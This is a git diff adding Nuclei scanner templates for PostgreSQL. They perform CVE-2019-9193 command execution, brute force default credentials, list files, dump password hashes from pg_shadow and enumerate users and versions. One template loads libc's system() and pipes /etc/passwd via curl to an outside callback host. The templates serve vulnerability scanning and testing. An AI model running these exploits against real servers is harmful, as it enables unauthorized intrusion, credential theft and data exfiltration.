diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml new file mode 100644 index 0000000000..15d4d1b99b --- /dev/null +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -0,0 +1,53 @@ +id: CVE-2019-9193 + +info: + name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution + author: pussycat0x + severity: high + description: | + In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’. + reference: + - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: cve,cve2018,js,network,postgresql,intrusive + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + const tbl = tbl_exec + const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",]; + for (const x of qry){ + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x); + Export(connected); + } + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + tbl_exec: "{{randbase(5)}}" + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + matchers-condition: and + matchers: + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + + - type: word + words: + - "cmd_output" diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml new file mode 100644 index 0000000000..fcec534fa9 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -0,0 +1,53 @@ +id: pgsql-default-db + +info: + name: Postgresql Default Database - Enumeration + author: pussycat0x + severity: high + description: | + postgres is the default database you will connect to before you have created any other databases. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-database-name + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ConnectWithDB(Host, Port, User, Pass, Db); + connected ; + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - foresight + - postgres + - template0 + - template1 + - test + + attack: clusterbomb + + matchers: + - type: dsl + dsl: + - "success == true" + - "response == true" + condition: and diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml new file mode 100644 index 0000000000..87a21b5b03 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -0,0 +1,47 @@ +id: postgresql-file-read + +info: + name: PostgreSQL File Read + author: pussycat0x + severity: high + description: | + Read and list the files within the PostgreSQL database, + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].pg_ls_dir' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml new file mode 100644 index 0000000000..e2e82ae7b5 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -0,0 +1,48 @@ +id: postgresql-list-database + +info: + name: PostgreSQL List Database + author: pussycat0x + severity: high + description: | + A single Postgres server process can manage multiple databases at the same time. Each database is stored as a separate set of files in its own directory within the server’s data directory. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes + - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].datname' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml new file mode 100644 index 0000000000..4e340dc902 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -0,0 +1,49 @@ +id: pgsql-exec + +info: + name: PostgreSQL List Password Hashes + author: pussycat0x + severity: high + description: | + Dump password hashes in use within a PostgreSQL database. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes + - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 + - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow"); + Export(connected) + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[] | "\(.usename) : \(.passwd)"' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml new file mode 100644 index 0000000000..e456bd84f7 --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -0,0 +1,47 @@ +id: pgsql-list-users + +info: + name: PostgreSQL List Users + author: pussycat0x + severity: high + description: | + List users from Postgresql Database. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,enum,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[].usename' \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml new file mode 100644 index 0000000000..710c720a8c --- /dev/null +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -0,0 +1,47 @@ +id: pgsql-version-detect + +info: + name: Postgresql Version - Detect + author: pussycat0x + severity: high + description: | + Detect Postgresql Version. + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-version + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,enum,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();"); + Export(connected); + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + + payloads: + usernames: + - postgres + - admin + password: + - postgres + - + - 123 + - amber + database: + - postgres + + attack: clusterbomb + + extractors: + - type: json + json: + - '.Rows[0].version' diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml new file mode 100644 index 0000000000..3d6a41b46e --- /dev/null +++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml @@ -0,0 +1,51 @@ +id: pgsql-extensions-rce + +info: + name: PostgreSQL 8.1 Extensions - Remote Code Execution + author: pussycat0x + severity: high + description: | + PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism. + reference: + - https://www.dionach.com/postgresql-9-x-remote-command-execution/ + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6 + - https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: postgresql,js,network,rce + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + const collab = shurl + const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"]; + for (const x of qry){ + connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x); + Export(connected); + } + + args: + Host: "{{Host}}" + Port: 5432 + User: "{{usernames}}" + Pass: "{{password}}" + Db: "{{database}}" + shurl: http://{{interactsh-url}} + + payloads: + usernames: + - postgres + database: + - postgres + password: + - postgres + + attack: clusterbomb + + matchers: + - type: regex + part: interactsh_request + regex: + - "root:[x*]:0:0:" diff --git a/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml b/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml new file mode 100644 index 0000000000..e319590b2d --- /dev/null +++ b/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml @@ -0,0 +1,34 @@ +id: postgresql-empty-password + +info: + name: Postgresql Empty Password - Detect + author: pussycat0x + severity: critical + description: | + Postgresql has a flaw that allows the attacker to login with empty password. + reference: + - https://www.tenable.com/plugins/nessus/104031 + metadata: + shodan-query: product:"PostgreSQL" + verified: true + tags: js,network,postgresql,authenticated + +javascript: + - code: | + const postgres = require('nuclei/postgres'); + const client = new postgres.PGClient; + const connected = client.Connect(Host, Port, User, Pass); + connected; + + args: + Host: "{{Host}}" + Port: 5432 + User: "postgres" + Pass: "" + + matchers: + - type: dsl + dsl: + - "success == true" + - "response == true" + condition: and